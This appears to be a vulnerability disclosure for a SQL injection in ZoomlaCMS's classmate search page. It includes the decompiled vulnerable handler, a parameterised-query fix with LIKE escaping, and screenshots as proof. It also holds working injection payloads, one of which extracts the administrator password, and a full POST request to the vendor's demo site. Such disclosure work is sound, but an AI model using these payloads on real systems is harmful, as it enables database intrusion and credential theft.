### Brief description:
http://www.zoomla.cn/down/2242.shtml
Updated 20140725.
### Details:
Register a front-end account (the new version bundles a large number of features) and log in. In the member center, the "find classmates" search at http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx is vulnerable to SQL injection.
```
/User/UserZone/School/SchoolFellow.aspx
<%@ page language="C#" autoeventwireup="true" inherits="User_UserZone_School_SchoolFellow, App_Web_tgw2vs0x" enableEventValidation="false" viewStateEncryptionMode="Never" %>
```
Decompiling App_Web_tgw2vs0x.dll:
```
App_Web_tgw2vs0x.User_UserZone_School_SchoolFellow
protected void Button1_Click(object sender, EventArgs e)
{
    int num2;
    // txtName.Text (the "find classmates" search box) is concatenated straight into the WHERE clause,
    // so a single quote in the input terminates the LIKE literal and the rest is executed as SQL
    DataTable table = this.st.Select_ByValue(" * ", " UserID in (select UserID from ZL_UserBase where TrueName like '%" + this.txtName.Text + "%') ", "");
```
This is a search-type (LIKE clause) injection.
```
z%' and @@version>0 and '%'='
z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='    (admin password)
```
Request to http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx
POST:
```
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTE0Nzc4NjkwNw9kFgICAw9kFgZmDw8WAh4EVGV4dAUJ6YCQ5rWqQ01TZGQCBQ9kFgICAQ88KwARAgEQFgAWABYADBQrAABkAg4PEGRkFgBkGAEFCUdyaWRWaWV3MQ9nZAfHrsmckVbLrrqqyYKBUUsyOWBm1AJUg2fMuuagtd6u&txtName=2013*(injection point)&Button1=%E6%9F%A5++%E6%89%BE
```
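The fix is to stop splicing the search term into the SQL text. The following is an added example, not Zoomla's code: it places the concatenation pattern from the decompiled handler next to a parameterised replacement written with plain ADO.NET. The table and column names ZL_UserBase, TrueName and UserID come from the report; the outer table name, the connection string and the method names are assumptions. Because the original `Select_ByValue` wrapper takes a raw WHERE string, the safe version bypasses it and builds a `SqlCommand` directly.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text;

// Added example (not Zoomla's code). Shows the vulnerable WHERE-clause construction
// from Button1_Click beside a parameterised query that treats the input as data.
public static class SchoolFellowQuery
{
    // 1. What the decompiled handler does: the textbox value is spliced into the
    //    WHERE clause. A single quote in the input ends the LIKE literal, and
    //    everything after it becomes part of the executed statement.
    public static string BuildVulnerableWhere(string txtName)
    {
        return " UserID in (select UserID from ZL_UserBase where TrueName like '%" + txtName + "%') ";
    }

    // 2. Hardened form: the search term travels as an SqlParameter, so quotes in the
    //    input can never close the literal. LIKE metacharacters are escaped as well,
    //    so a user cannot turn "%" or "_" into wildcards; ESCAPE '\' tells SQL Server
    //    that a backslash marks a literal character.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string txtName)
    {
        SqlCommand cmd = conn.CreateCommand();
        cmd.CommandText =
            "SELECT * FROM ZL_SchoolFellow " +            // outer table name assumed
            "WHERE UserID IN (SELECT UserID FROM ZL_UserBase " +
            "WHERE TrueName LIKE @pattern ESCAPE '\\')";
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value =
            "%" + EscapeLikePattern(txtName) + "%";
        return cmd;
    }

    // Escapes the characters that have special meaning inside a SQL Server LIKE pattern
    // ('%', '_', '[' and the escape character itself).
    public static string EscapeLikePattern(string value)
    {
        var sb = new StringBuilder(value.Length);
        foreach (char c in value)
        {
            if (c == '\\' || c == '%' || c == '_' || c == '[')
                sb.Append('\\');
            sb.Append(c);
        }
        return sb.ToString();
    }

    public static void Main()
    {
        // Constructed input: the first probe string quoted in the report.
        string input = "z%' and @@version>0 and '%'='";

        Console.WriteLine("Vulnerable WHERE clause built from the input:");
        Console.WriteLine(BuildVulnerableWhere(input));

        // Connection string is a placeholder; the command is only built, not executed, here.
        using (var conn = new SqlConnection("Server=.;Database=zoomla;Integrated Security=true"))
        {
            SqlCommand cmd = BuildSafeCommand(conn, input);
            Console.WriteLine("Parameterised SQL text:");
            Console.WriteLine(cmd.CommandText);
            Console.WriteLine("@pattern parameter value (matched literally by the server):");
            Console.WriteLine(cmd.Parameters["@pattern"].Value);
        }
    }
}
```

Running `Main` prints the spliced WHERE clause, where the injected condition is visibly part of the statement, and then the fixed SQL text, which never changes regardless of input: the whole search term, quotes and all, arrives in `@pattern` and is compared literally. The same change applies to every place in the application that passes user text into `Select_ByValue` as a WHERE fragment.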
### Proof of vulnerability:
![080201.jpg](https://images.seebug.org/upload/201408/02111038c645d622cf5c8d8a8f864d0205ca772d.jpg)
![080202.jpg](https://images.seebug.org/upload/201408/021110542e8237f2cc2b30f9009002e13c91ea41.jpg)